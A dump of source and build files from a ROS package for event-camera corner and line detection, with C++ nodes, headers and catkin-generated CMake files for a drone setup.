roscpp_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... tests\"\n\t@echo \"... download_extra_data\"\n\t@echo \"... run_tests\"\n\t@echo \"... davis_corner_geneus\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_nodejs\"\n\t@echo \"... clean_test_results\"\n\t@echo \"... dvs_msgs_generate_messages_eus\"\n\t@echo \"... sensor_msgs_generate_messages_py\"\n\t@echo \"... hear_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... sensor_msgs_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_eus\"\n\t@echo \"... std_msgs_generate_messages_nodejs\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... sensor_msgs_generate_messages_nodejs\"\n\t@echo \"... install/local\"\n\t@echo \"... doxygen\"\n\t@echo \"... sensor_msgs_generate_messages_lisp\"\n\t@echo \"... dvs_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... hear_msgs_generate_messages_cpp\"\n\t@echo \"... davis_corner_gencpp\"\n\t@echo \"... dvs_msgs_generate_messages_py\"\n\t@echo \"... gmock_main\"\n\t@echo \"... gmock\"\n\t@echo \"... gtest_main\"\n\t@echo \"... gtest\"\n\t@echo \"... src/Circle_detector.o\"\n\t@echo \"... src/Circle_detector.i\"\n\t@echo \"... src/Circle_detector.s\"\n\t@echo \"... src/EventPlotting.o\"\n\t@echo \"... src/EventPlotting.i\"\n\t@echo \"... src/EventPlotting.s\"\n\t@echo \"... src/Event_vis.o\"\n\t@echo \"... src/Event_vis.i\"\n\t@echo \"... src/Event_vis.s\"\n\t@echo \"... src/ROSUnit_Optitrack.o\"\n\t@echo \"... 
src/ROSUnit_Optitrack.i\"\n\t@echo \"... src/ROSUnit_Optitrack.s\"\n\t@echo \"... src/RotationMatrix3by3.o\"\n\t@echo \"... src/RotationMatrix3by3.i\"\n\t@echo \"... src/RotationMatrix3by3.s\"\n\t@echo \"... src/main.o\"\n\t@echo \"... src/main.i\"\n\t@echo \"... src/main.s\"\n\t@echo \"... src/medianFilter.o\"\n\t@echo \"... src/medianFilter.i\"\n\t@echo \"... src/medianFilter.s\"\n\t@echo \"... src/rayrotation_events.o\"\n\t@echo \"... src/rayrotation_events.i\"\n\t@echo \"... src/rayrotation_events.s\"\n\t@echo \"... src/rotation_accelerometer.o\"\n\t@echo \"... src/rotation_accelerometer.i\"\n\t@echo \"... src/rotation_accelerometer.s\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.5930539965629578,
"alphanum_fraction": 0.5989052653312683,
"avg_line_length": 67.80519104003906,
"blob_id": "68007ef8a458f8e0f2f3ab7d2091a617e2b0efb6",
"content_id": "24da3aa286f88aacd08e79c810623ba60ba8ab5b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5298,
"license_type": "no_license",
"max_line_length": 169,
"num_lines": 77,
"path": "/src/main.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"Event_vis.hpp\"\n#include \"EventPlotting.hpp\"\n#include \"Circle_detector.hpp\"\n#include <ros/ros.h>\n#include \"rayrotation_events.hpp\"\n#include \"rotation_accelerometer.hpp\"\n#include <opencv2/core/types.hpp>\n#include \"HEAR_ROS_BRIDGE/ROSUnit_Factory.hpp\"\n#include \"ROSUnit_Optitrack.hpp\"\n\n#include <iostream>\n\nint main(int argc, char** argv)\n{\n\nros::init(argc, argv, \"ball_detector_node\");\nros::NodeHandle main_nodehandle;\nROSUnit_Factory ROSUnit_Factory_main{main_nodehandle};\nROSUnit_Optitrack* position_in_z=new ROSUnit_Optitrack(main_nodehandle);\nEvent_vis* visualisation=new Event_vis(main_nodehandle);\nCircle_detector* detection=new Circle_detector(main_nodehandle);\n\nROSUnit* rosunit_x_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/x\");\nROSUnit* rosunit_y_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/y\");\nROSUnit* rosunit_roll_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/roll\");\nROSUnit* rosunit_pitch_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/pitch\");\nROSUnit* rosunit_yaw_provider = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_Point,\n \"/providers/yaw\");\nROSUnit* rosunit_imu_acceleration = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Subscriber, \n ROSUnit_msg_type::ROSUnit_GeoVec,\n \"/imu/acceleration\");\nROSUnit* rosunit_camera = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Publisher,\n ROSUnit_msg_type::ROSUnit_Point,\n \"/camera_provider\");\nROSUnit* rosunit_accelerometer = ROSUnit_Factory_main.CreateROSUnit(ROSUnit_tx_rx_type::Publisher,\n ROSUnit_msg_type::ROSUnit_Point,\n \"/accelerometer_rotated\");\n \n\nrayrotation_events* rotate_pv = new rayrotation_events();\nrotation_accelerometer* rotate_accelerometer = new 
rotation_accelerometer();\n\ndetection->getPorts()[(int)Circle_detector::ports_id::OP_0_DATA]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_0_CAMERA]);\nrosunit_x_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_0]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_1_X_POSITION]);\nrosunit_y_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_1]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_2_Y_POSITION]);\nposition_in_z->getPorts()[(int)ROSUnit_Optitrack::ports_id::OP_0_OPT]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_3_Z_POSITION]);\nrosunit_roll_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_2]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_4_ROLL]);\nrosunit_pitch_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_3]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_5_PITCH]);\nrosunit_yaw_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_4]->connect(rotate_pv->getPorts()[(int)rayrotation_events::ports_id::IP_6_YAW]);\n\nrotate_pv->getPorts()[(int)rayrotation_events::ports_id::OP_0_DATA]->connect(rosunit_camera->getPorts()[(int)ROSUnit_PointPub::ports_id::IP_0]);\nrosunit_imu_acceleration->getPorts()[(int)ROSUnit_GeoVecSub::ports_id::OP_0]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_0_IMU]);\nrosunit_roll_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_2]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_1_ROLL]);\nrosunit_pitch_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_3]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_2_PITCH]);\nrosunit_yaw_provider->getPorts()[(int)ROSUnit_PointSub::ports_id::OP_4]->connect(rotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::IP_3_YAW]);\n\nrotate_accelerometer->getPorts()[(int)rotation_accelerometer::ports_id::OP_0_DATA]->connect(rosunit_accelerometer->getPorts()[(int)ROSUnit_PointPub::ports_id::IP_0]);\n\n\n\nros::Rate r(200);\nwhile (ros::ok())\n{\n r.sleep();\n ros::spinOnce();\n}\nreturn 0;\n}\n"
},
{
"alpha_fraction": 0.6335078477859497,
"alphanum_fraction": 0.6675392389297485,
"avg_line_length": 20.27777862548828,
"blob_id": "4b1832d5fd468e06d176c902589f134dabc49abe",
"content_id": "d1066677b60c343c32316ab73cad0dfc78d79389",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 18,
"path": "/include/RotationMatrix3by3.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"HEAR_math/Vector3D.hpp\"\n#include <iostream>\n#include <eigen3/Eigen/Dense>\n#include <math.h>\n\nusing Eigen::MatrixXd;\n\nclass RotationMatrix3by3 : public Matrix3by3\n{\n private:\n /* data */\n public:\n RotationMatrix3by3(/* args */);\n ~RotationMatrix3by3();\n MatrixXd Update(Vector3D<float>);\n};"
},
{
"alpha_fraction": 0.7206851243972778,
"alphanum_fraction": 0.7378129363059998,
"avg_line_length": 24.33333396911621,
"blob_id": "be535efaf5cd2ecfccb4d49852a125a19403692f",
"content_id": "e4324dac69b8cf4b358f2bd91f66b9d5aa7c02f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 30,
"path": "/include/EventPlotting.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include <iostream>\n#include <image_transport/image_transport.h>\n#include <cv_bridge/cv_bridge.h>\n#include <sensor_msgs/image_encodings.h>\n#include <opencv2/imgproc/imgproc.hpp>\n#include <opencv2/highgui/highgui.hpp>\n#include <opencv2/core/types.hpp>\n#include <dvs_msgs/EventArray.h>\n#include <cmath>\n#include \"std_msgs/Float32.h\"\n\nclass EventPlotting\n{\n public:\n ros::NodeHandle nh_;\n ros::Subscriber sub;\n static ros::Publisher pub;\n static cv::Point2f c1;\n static cv::Point2f c2;\n static cv::Point2f center;\n static std_msgs::Float32 msg1;\n\n const std::string OPENCV_WINDOW = \"Image window\";\n static const double vertical_slope_threshold;\n\n EventPlotting(ros::NodeHandle&);\n ~EventPlotting();\n\n static void Events(dvs_msgs::EventArray msg);\n};"
},
{
"alpha_fraction": 0.7910447716712952,
"alphanum_fraction": 0.7960199117660522,
"avg_line_length": 49.25,
"blob_id": "f9f372d6213046fc34b8a46e3ec7f6dfc14f6fb6",
"content_id": "88ee29949128ea3c913d8d9464df835177335c0e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 201,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 4,
"path": "/build/devel/share/davis_corner/cmake/davis_corner-msg-paths.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(davis_corner_MSG_INCLUDE_DIRS \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg\")\nset(davis_corner_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7699766159057617,
"alphanum_fraction": 0.7717597484588623,
"avg_line_length": 34.891998291015625,
"blob_id": "69913fccf0e4269a2ca35377712a38c3b67a8a05",
"content_id": "6d96e6d4229426052d905bf418269cc7242d0abb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 8973,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 250,
"path": "/build/cmake/davis_corner-genmsg.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"davis_corner: 1 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Idavis_corner:/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg;-Istd_msgs:/opt/ros/melodic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(davis_corner_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_custom_target(_davis_corner_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"davis_corner\" \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" \"\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_cpp _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_gencpp)\nadd_dependencies(davis_corner_gencpp davis_corner_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_eus _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_geneus)\nadd_dependencies(davis_corner_geneus davis_corner_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(davis_corner\n 
\"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_lisp _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_genlisp)\nadd_dependencies(davis_corner_genlisp davis_corner_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_nodejs _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_gennodejs)\nadd_dependencies(davis_corner_gennodejs davis_corner_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS davis_corner_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(davis_corner\n \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\"\n \"${MSG_I_FLAGS}\"\n \"\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(davis_corner\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(davis_corner_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(davis_corner_generate_messages davis_corner_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/ku-t2/catkin_ws_eventcamera/src/davis_corner/msg/Corners.msg\" NAME_WE)\nadd_dependencies(davis_corner_generate_messages_py _davis_corner_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(davis_corner_genpy)\nadd_dependencies(davis_corner_genpy davis_corner_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS 
davis_corner_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/davis_corner\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(davis_corner_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/davis_corner\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(davis_corner_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/davis_corner\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(davis_corner_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/davis_corner\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(davis_corner_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python2\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/davis_corner\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(davis_corner_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.4723816215991974,
"alphanum_fraction": 0.5261836647987366,
"avg_line_length": 31.045976638793945,
"blob_id": "c0be08e5e27850401b7952dad2ab43818eb0cc1c",
"content_id": "d4f9f87b544eb8e953f082522c9bf97cc17906f1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2788,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 87,
"path": "/src/EventPlotting.cpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#include \"EventPlotting.hpp\"\n\nconst double EventPlotting::vertical_slope_threshold = 60. * (M_PI / 180);\nros::Publisher EventPlotting::pub;\ncv::Point2f EventPlotting::c1;\ncv::Point2f EventPlotting::c2; \ncv::Point2f EventPlotting::center;\nstd_msgs::Float32 EventPlotting::msg1;\n\nEventPlotting::EventPlotting(ros::NodeHandle &t_nh)\n{\n\n nh_ = t_nh;\n sub = nh_.subscribe(\"/dvs/events\", 1, &EventPlotting::Events);\n pub = nh_.advertise<std_msgs::Float32>(\"chatter\", 1000);\n cv::namedWindow(OPENCV_WINDOW);\n}\n\nEventPlotting::~EventPlotting()\n{\n cv::destroyWindow(OPENCV_WINDOW);\n}\n\nvoid EventPlotting::Events(dvs_msgs::EventArray msg)\n{\n cv::Mat EventsWindow = cv::Mat::zeros(260, 346, CV_8UC1);\n cv::Mat cdstP = cv::Mat::zeros(260, 346, CV_8UC1);\n\n for (int i = 0; i < msg.events.size(); i++)\n {\n cv::circle(EventsWindow, cv::Point(msg.events[i].x, msg.events[i].y), 0.5, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n std::vector<cv::Vec4i> linesP;\n HoughLinesP(EventsWindow, linesP, 1, CV_PI / 180, 50, 50, 10);\n if (linesP.size() > 1)\n {\n for (size_t i = 0; i < linesP.size(); i++)\n {\n cv::Vec4i l = linesP[i];\n\n if (fabs(l[0] - l[2]) > 0)\n {\n double angle = fabs(atan((double)(l[3] - l[1]) / (double)(l[2] - l[0])));\n\n if (angle > vertical_slope_threshold)\n {\n cv::line(cdstP, cv::Point(l[0], l[1]), cv::Point(l[2], l[3]), cv::Scalar(255, 0, 0), 3, cv::LINE_AA);\n }\n }\n\n else\n {\n cv::line(cdstP, cv::Point(l[0], l[1]), cv::Point(l[2], l[3]), cv::Scalar(255, 0, 0), 3, cv::LINE_AA);\n }\n }\n std::vector<std::vector<cv::Point>> contours;\n std::vector<cv::Vec4i> hierarchy;\n findContours(cdstP, contours, hierarchy, cv::RETR_EXTERNAL, cv::CHAIN_APPROX_NONE);\n std::vector<cv::Moments> mu(contours.size());\n if (contours.size() > 1)\n {\n mu[0] = moments(contours[0], false);\n c1.x = mu[0].m10 / mu[0].m00;\n c1.y = mu[0].m01 / mu[0].m00;\n mu[1] = moments(contours[1], false);\n c2.x = mu[1].m10 / mu[1].m00;\n c2.y = mu[1].m01 / mu[1].m00;\n center.x = (c2.x + c1.x) / 2;\n center.y = (c1.y + c2.y) / 2;\n }\n msg1.data = center.x;\n pub.publish(msg1);\n cv::circle(cdstP, center, 10, cv::Scalar(255, 0, 0), -1, 8);\n }\n else\n {\n msg1.data = center.x;\n pub.publish(msg1);\n cv::circle(cdstP, center, 10, cv::Scalar(255, 0, 0), -1, 8);\n }\n\n cv::imshow(\"EventsWindow\", EventsWindow);\n imshow(\"Detected Lines (in red) - Probabilistic Line Transform\", cdstP);\n\n cv::waitKey(1);\n}\n"
},
{
"alpha_fraction": 0.6612510085105896,
"alphanum_fraction": 0.6799350380897522,
"avg_line_length": 30.58974266052246,
"blob_id": "1eff27c24b7fe4511aa8ba06c86ac413acacc979",
"content_id": "2d0fdbfb2b01aec142acac05188640012cb9c648",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1231,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/include/rotation_accelerometer.hpp",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"HEAR_math/Matrix3by3.hpp\"\n#include \"RotationMatrix3by3.hpp\"\n#include <opencv2/core/types.hpp>\n#include <iostream>\n#include <math.h>\n#include <eigen3/Eigen/Dense>\n#include \"HEAR_math/Vector3D.hpp\"\n#include \"HEAR_msg/Vector3DMsg.hpp\"\n#include <ros/ros.h>\n#include \"HEAR_core/InputPort.hpp\"\n#include \"HEAR_core/OutputPort.hpp\"\n#include \"HEAR_core/Block.hpp\"\n\nusing Eigen::MatrixXd;\n\nclass rotation_accelerometer : public Block\n{\n private:\n Port* _input_port_0;\n Port* _input_port_1;\n Port* _input_port_2;\n Port* _input_port_3;\n Port* _output_port;\n public:\n Vector3D<float> accelerometer_data,drone_orientation,rotated_unit_vector;\n RotationMatrix3by3 R_accelerometer_origin,R_drone_origin;\n Vector3D<float> rotated_acceleration;\n Vector3DMsg all_parameters;\n void process(DataMsg* t_msg, Port* t_port);\n Vector3D<float> Update_accelerometer_vector(MatrixXd);\n void update_rotation_matrices();\n rotation_accelerometer();\n enum ports_id {IP_0_IMU,IP_1_ROLL,IP_2_PITCH,IP_3_YAW,OP_0_DATA};\n \n\n enum receiving_channels {accelerometer,ch_roll,ch_pitch,ch_yaw};\n ~rotation_accelerometer();\n};"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7647058963775635,
"avg_line_length": 41.5,
"blob_id": "8e1cf20025cb09efffea5034ea6641728dd8f888",
"content_id": "5c260502962a734fbd7aee1371829f2faed5bfd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/build/catkin_generated/installspace/davis_corner-msg-extras.cmake",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
"text": "set(davis_corner_MESSAGE_FILES \"msg/Corners.msg\")\nset(davis_corner_SERVICE_FILES \"\")\n"
},
{
"alpha_fraction": 0.7253414392471313,
"alphanum_fraction": 0.734446108341217,
"avg_line_length": 81.375,
"blob_id": "da76e483a29e24e4663c35e45e5f7f0fec5be7e4",
"content_id": "bb23b59f42ccd5c486fccf50abbe626f36cf8587",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 659,
"license_type": "no_license",
"max_line_length": 207,
"num_lines": 8,
"path": "/build/catkin_generated/pkg.develspace.context.pc.py",
"repo_name": "oussamaabdulhay/davis_corner",
"src_encoding": "UTF-8",
